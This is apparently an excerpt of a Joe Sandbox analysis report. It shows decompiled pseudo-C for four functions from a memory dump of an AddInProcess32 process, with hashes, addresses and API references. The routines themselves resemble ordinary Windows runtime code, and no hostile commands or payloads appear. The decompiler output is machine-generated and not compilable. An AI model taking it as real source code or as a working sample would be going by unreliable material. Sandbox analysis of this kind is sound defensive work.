0x018c4e7c
0x00000000
0x00000000
0x018c4e85
0x00000000
0x018c4e85
0x00000000
0x01880517

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71783d3b3cb87783f6ecbd42d935a578ca12ca852abc23faae455838b43c02b2
Instruction ID: aad5cd7da92fedb5c4639d47b4f3fdb8b000ecca7c55b5681a8193d8afc388dc
Opcode Fuzzy Hash: 71783d3b3cb87783f6ecbd42d935a578ca12ca852abc23faae455838b43c02b2
Instruction Fuzzy Hash: 7F914C31E042199FEB31AB6CC854BAD7BA4EB01B28F050269FA11EB2D1D774DF84C791

Uniqueness

Uniqueness Score: -1.00%

Function 0187B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0187B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x194d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01877D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01928CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01899E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0189B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0189CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01877D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01928F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0189AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1948628; // 0x0
								_v68 = _t77;
								_t78 =  *0x194862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1948628; // 0x0
							_t116 =  *0x194862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0187b94c
0x0187b956
0x0187b95c
0x0187b95e
0x0187b964
0x0187b969
0x0187b96d
0x0187b96d
0x0187b970
0x0187b974
0x0187b97a
0x0187badf
0x0187badf
0x0187bae2
0x0187bae4
0x0187bae6
0x0187baf0
0x018c2cb8
0x0187baf6
0x0187baf6
0x0187baf6
0x0187bafd
0x0187bb1f
0x0187bb1f
0x0187baff
0x0187bb00
0x0187bb00
0x0187bb03
0x0187bb03
0x0187bacb
0x0187bacf
0x0187bad0
0x0187bad1
0x0187badc
0x0187badc
0x0187b980
0x0187b980
0x0187b988
0x0187b98b
0x0187b98d
0x0187b990
0x0187b993
0x0187b999
0x0187b99b
0x0187b9a1
0x0187b9a5
0x0187b9aa
0x0187b9b0
0x0187b9bb
0x0187b9c0
0x0187b9c3
0x0187b9ca
0x0187b9cc
0x0187b9cf
0x0187b9d3
0x0187b9d7
0x0187ba94
0x0187ba94
0x0187ba98
0x0187baa3
0x018c2ccb
0x0187baa9
0x0187baa9
0x0187baa9
0x0187bab1
0x018c2cd5
0x018c2cdd
0x018c2cdd
0x0187babb
0x0187babc
0x0187bac2
0x0187bac3
0x0187bac3
0x0187bac6
0x00000000
0x0187b9dd
0x0187b9dd
0x0187b9e7
0x0187b9e7
0x0187b9ec
0x0187b9ec
0x0187b9f1
0x0187b9f5
0x0187b9fa
0x0187ba00
0x0187ba0c
0x0187ba10
0x0187ba10
0x0187ba12
0x0187ba18
0x00000000
0x00000000
0x0187bb26
0x0187bb26
0x0187ba1e
0x0187ba1e
0x0187ba23
0x0187ba25
0x0187ba2c
0x0187ba30
0x0187ba35
0x0187ba35
0x0187ba41
0x0187ba46
0x0187ba4c
0x0187ba50
0x0187ba54
0x0187ba6a
0x0187ba6e
0x0187ba70
0x0187ba74
0x0187ba78
0x0187ba7a
0x0187ba7c
0x0187ba8e
0x0187ba90
0x0187ba92
0x0187bb14
0x0187bb14
0x0187bb16
0x0187bb16
0x00000000
0x0187ba7c
0x0187bb0a
0x0187bb0d
0x00000000
0x00000000
0x00000000
0x0187bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0187B9A5

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 7f8f239f8738198137cc7b2dcb44a7ab75b2aee759b12a1dac66ea671bb663c2
Instruction ID: 0e2552a09e1977429756d50c9cb39ed73fd635cde41e2af6eced0ac53950c0fc
Opcode Fuzzy Hash: 7f8f239f8738198137cc7b2dcb44a7ab75b2aee759b12a1dac66ea671bb663c2
Instruction Fuzzy Hash: B6513671A09345CFC721EF68C08092AFBE6BB88714F14496EE995C7355E730EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0185B171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0185B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x192f7a8);
				E018AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E018AD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0189D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0189F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E018ADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0189B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0189B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0189E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0189A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0185b171
0x0185b171
0x0185b171
0x0185b171
0x0185b171
0x0185b176
0x0185b17b
0x0185b180
0x0185b186
0x0185b18f
0x0185b198
0x0185b1a4
0x0185b1aa
0x018b4802
0x018b4802
0x018b4805
0x018b480c
0x018b480e
0x0185b1d1
0x0185b1d3
0x0185b1de
0x0185b1de
0x018b4817
0x018b481e
0x018b4820
0x018b4822
0x018b4822
0x018b4824
0x018b4824
0x018b482a
0x00000000
0x00000000
0x018b4835
0x018b483a
0x018b483d
0x018b483f
0x018b4842
0x018b4842
0x018b4842
0x018b4846
0x018b484c
0x018b484e
0x018b4851
0x018b4851
0x018b4853
0x018b4854
0x018b4854
0x018b4858
0x018b485a
0x018b485a
0x018b485d
0x018b485f
0x018b4861
0x018b4861
0x018b4866
0x018b486b
0x018b486e
0x018b4871
0x018b4876
0x018b4876
0x018b4878
0x018b487b
0x018b4884
0x018b4884
0x00000000
0x018b487d
0x018b487d
0x018b4882
0x018b4889
0x018b4889
0x018b488f
0x018b4891
0x018b48e0
0x018b48e2
0x018b48e4
0x018b48e4
0x018b48e7
0x018b48e7
0x018b48ed
0x018b48f4
0x018b48f6
0x018b4951
0x018b4951
0x018b4953
0x018b4953
0x018b4956
0x018b4956
0x018b4958
0x018b4959
0x018b4959
0x018b495d
0x018b495d
0x018b495f
0x018b495f
0x018b4965
0x018b4969
0x018b49ba
0x018b49ba
0x018b49c1
0x018b49c5
0x018b49cc
0x018b49d4
0x018b49d7
0x018b49da
0x018b49e4
0x018b49e5
0x018b49f3
0x018b4a02
0x00000000
0x018b4a02
0x018b4972
0x018b4974
0x00000000
0x00000000
0x018b4976
0x018b4979
0x018b4982
0x018b4983
0x018b4984
0x018b498b
0x018b498d
0x018b4991
0x018b4993
0x018b4999
0x018b499d
0x018b49a2
0x018b49a2
0x018b49a2
0x018b4999
0x018b49ac
0x00000000
0x018b49b3
0x018b48f8
0x018b48fe
0x00000000
0x00000000
0x00000000
0x018b48fe
0x018b4895
0x018b489c
0x018b48ad
0x018b48b2
0x018b48b5
0x018b48b7
0x018b48ba
0x018b48bc
0x018b48c6
0x018b48c6
0x018b48cb
0x018b48d1
0x018b48d4
0x018b48d8
0x018b48d8
0x00000000
0x018b48d8
0x018b48be
0x018b48c0
0x00000000
0x00000000
0x018b48c2
0x00000000
0x00000000
0x00000000
0x018b48c4
0x00000000
0x018b4882
0x018b487b
0x018b4904
0x018b4906
0x00000000
0x00000000
0x018b4908
0x018b490e
0x00000000
0x00000000
0x018b4910
0x018b4917
0x018b4917
0x00000000
0x018b4917
0x0185b1ba
0x018b47f9
0x018b47fc
0x00000000
0x00000000
0x00000000
0x018b47fc
0x0185b1c0
0x0185b1c0
0x0185b1c3
0x0185b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 018B48AD

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: db2353ee540614c3a244ae085586e54c029789547c4b77d42f2b1c7f1683bfba
Instruction ID: 4ec8f718e38fa5ee8bcfacacaa26aeb907bf988d5547219efd29b023b008efb6
Opcode Fuzzy Hash: db2353ee540614c3a244ae085586e54c029789547c4b77d42f2b1c7f1683bfba
Instruction Fuzzy Hash: FE51C071D002598EEF35CF688886BEEBBB1EF00714F1441A9D85AEB393D7705A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01903D40 Relevance: 1.6, APIs: 1, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01903D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x194d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E01872280(_t34, 0x1948a6c);
				_t64 =  *0x1945768; // 0x77995768
				if(_t64 != 0x1945768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77995770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0186FFB0(_t53, _t64, 0x1948a6c);
						 *0x194b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E01872280(_t45, 0x1948a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1945768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0186FFB0(_t51, _t64, 0x1948a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0189B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x01903d40
0x01903d48
0x01903d52
0x01903d59
0x01903d5d
0x01903d61
0x01903d63
0x01903d67
0x01903d69
0x01903d72
0x01903d76
0x01903d7a
0x01903d7f
0x01903d8b
0x01903d91
0x01903d91
0x01903d91
0x01903d94
0x01903d96
0x01903d9d
0x01903da1
0x01903db0
0x01903dba
0x01903dbc
0x01903dbc
0x01903dc6
0x01903dcb
0x01903dcf
0x01903dd1
0x01903dd4
0x00000000
0x00000000
0x01903dd9
0x01903e0c
0x01903e0c
0x01903e0f
0x01903ddb
0x01903ddb
0x01903de0
0x00000000
0x01903de2
0x01903de2
0x01903de4
0x01903de8
0x01903deb
0x01903df1
0x00000000
0x01903df3
0x01903df3
0x01903df5
0x01903df8
0x01903dfa
0x00000000
0x01903dfa
0x01903df1
0x01903de0
0x01903e11
0x01903e11
0x00000000
0x01903dfe
0x01903e04
0x01903e06
0x00000000
0x01903e06
0x00000000
0x01903e04
0x01903d91
0x01903e15
0x01903e1a
0x01903e1f
0x01903e1f
0x01903e23
0x01903e29
0x00000000
0x00000000
0x01903e2e
0x00000000
0x01903e30
0x01903e30
0x01903e35
0x00000000
0x01903e37
0x01903e3e
0x01903e42
0x01903e48
0x01903e4e
0x00000000
0x01903e4e
0x01903e35
0x00000000
0x01903e2e
0x01903e5b
0x01903e5c
0x01903e5d
0x01903e68
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01903DB0

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 50c772db132a655ed01dc9ccd5ed857becc20b0ed3e297c3c6bd1637666fb3d5
Instruction ID: 3bf7ac692a91b04b1417e05c070ba540da0cea34b88b02e464d7306ceb44afb6
Opcode Fuzzy Hash: 50c772db132a655ed01dc9ccd5ed857becc20b0ed3e297c3c6bd1637666fb3d5
Instruction Fuzzy Hash: A9319AB1609302DFCB12DF68D58081ABBE9FF85715F054A6EE4889B291D730EE04CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01894A2C Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01894A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x194d360 ^ _t62;
				_v8 =  *0x194d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01872280(_t26, 0x1948608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0186FFB0(_t41, _t51, 0x1948608);
						L2:
						 *0x194b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0189B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01872280(_t28, 0x1948608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0186FFB0(_t42, _t53, 0x1948608);
							if(_t53 != 0) {
								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0186FFB0(_t41, _t51, 0x1948608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01894a2c
0x01894a34
0x01894a3c
0x01894a3e
0x01894a48
0x01894a4b
0x01894a4d
0x01894a51
0x01894a9c
0x00000000
0x00000000
0x01894aa3
0x01894aa8
0x01894aad
0x01894ab1
0x01894ade
0x01894ae3
0x01894a5a
0x01894a62
0x01894a6a
0x01894a6e
0x018cf203
0x01894a84
0x01894a88
0x01894a89
0x01894a8a
0x01894a95
0x01894a95
0x01894a79
0x01894a80
0x01894af2
0x01894af4
0x01894af9
0x01894aff
0x01894b01
0x01894b03
0x01894b08
0x018cf20a
0x018cf212
0x018cf216
0x018cf216
0x01894b08
0x01894b13
0x01894b1a
0x018cf229
0x018cf229
0x01894b1a
0x01894a82
0x00000000
0x01894a82
0x01894ab7
0x01894acd
0x01894acd
0x01894ad5
0x01894ada
0x00000000
0x01894ada
0x01894ac2
0x01894acb
0x00000000
0x00000000
0x00000000
0x01894acb
0x01894a53
0x01894a53
0x01894a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 01894A62

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1b5c2fce58ab02f1c86ea69681d6f7330abb691da3a601e15d5cf453532de726
Instruction ID: 505139c03e6d95fc8be6b41ee544027d105f7e18fb059ad81cdbc069c6035e5b
Opcode Fuzzy Hash: 1b5c2fce58ab02f1c86ea69681d6f7330abb691da3a601e15d5cf453532de726
Instruction Fuzzy Hash: 0F3144322153019BCB22DF58CA80B2ABBE6FFC1B14F08042DE91AC7241CB74DA01CB86

Uniqueness

Uniqueness Score: -1.00%

